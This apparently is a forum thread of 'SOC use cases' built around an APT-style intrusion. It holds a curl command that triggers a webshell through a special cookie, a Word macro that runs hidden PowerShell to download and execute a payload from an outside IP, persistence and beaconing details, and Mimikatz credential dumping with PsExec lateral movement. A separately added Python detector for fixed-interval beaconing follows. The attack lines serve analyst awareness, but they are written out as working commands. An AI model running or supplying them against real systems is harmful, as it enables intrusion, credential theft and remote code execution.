SOC Usecase
  • SOC Usecase

    Activate WebShell Via special cookie

    Code:
    curl ---cookie "DSLogdSession=xyz" https://victim-ics/home/webserver/htdocs/dana-na/cc/ccupdate.cgi?cmd=whoami 

  • #2
    APT-1 attacks on Westinghouse Electric Company

    initial access
    - phishing
    - Word document with VBA, macro enabled

    Code:
    Sub AutoOpen()
    Dim objShell As Object
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "powershell -w hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://203.81.99.37/payload.ps1')"
    End Sub

    Dropper: C:\Users\Public\chrome_upd.exe

    [ Persist ]
    Start-Process -FilePath "chrome_upd.exe" -ArgumentList "/silent /task:sync" -WindowStyle Hidden

    POST request every 30s to http://updater[.]info/report.php

    [ Lateral Movement ]
    PsExec + Mimikatz

    Code:
    .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
    psexec.exe \\TARGET -u admin -p password cmd.exe

    [ Data Gathering and Exfiltration ]

    powershell + RAR
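As an added defender-side example (not code from this post), the following Python detector flags the fixed-interval beaconing described above, a POST every 30s to the same URL, in constructed proxy log lines; the log format, the host addresses and the thresholds are assumptions.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample proxy log lines: "<ISO timestamp> <src ip> <method> <url> <status>".
# Host 10.0.0.12 shows the 30s POST beacon from the post; 10.0.0.15 is normal browsing.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z 10.0.0.12 POST http://updater.info/report.php 200
2024-05-01T10:00:03Z 10.0.0.12 GET http://example.org/index.html 200
2024-05-01T10:00:30Z 10.0.0.12 POST http://updater.info/report.php 200
2024-05-01T10:01:00Z 10.0.0.12 POST http://updater.info/report.php 200
2024-05-01T10:01:30Z 10.0.0.12 POST http://updater.info/report.php 200
2024-05-01T10:02:00Z 10.0.0.12 POST http://updater.info/report.php 200
2024-05-01T10:00:10Z 10.0.0.15 GET http://example.org/a 200
2024-05-01T10:04:00Z 10.0.0.15 GET http://example.org/a 200
2024-05-01T10:04:05Z 10.0.0.15 GET http://example.org/a 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d+)$")

def parse(log_text):
    """Yield (timestamp, src_ip, method, url) tuples; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m.group(2), m.group(3), m.group(4)

def find_beacons(log_text, min_hits=4, max_jitter=0.2):
    """Return {(src, url): mean_interval_s} for pairs whose request gaps are
    near-constant (coefficient of variation <= max_jitter) over >= min_hits requests."""
    buckets = defaultdict(list)
    for ts, src, _method, url in parse(log_text):
        buckets[(src, url)].append(ts)
    hits = {}
    for key, times in buckets.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        # Guard against mean == 0 (duplicate timestamps) before dividing.
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter:
            hits[key] = round(mean, 1)
    return hits

if __name__ == "__main__":
    for (src, url), interval in find_beacons(SAMPLE_LOG).items():
        print(f"possible beacon: {src} -> {url} every ~{interval}s")
```

Real malware often adds jitter, so tune max_jitter and min_hits to the window you query rather than trusting one fixed threshold.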



    • #3
      Auditd and Log Forwarders Status

      coming soon .....
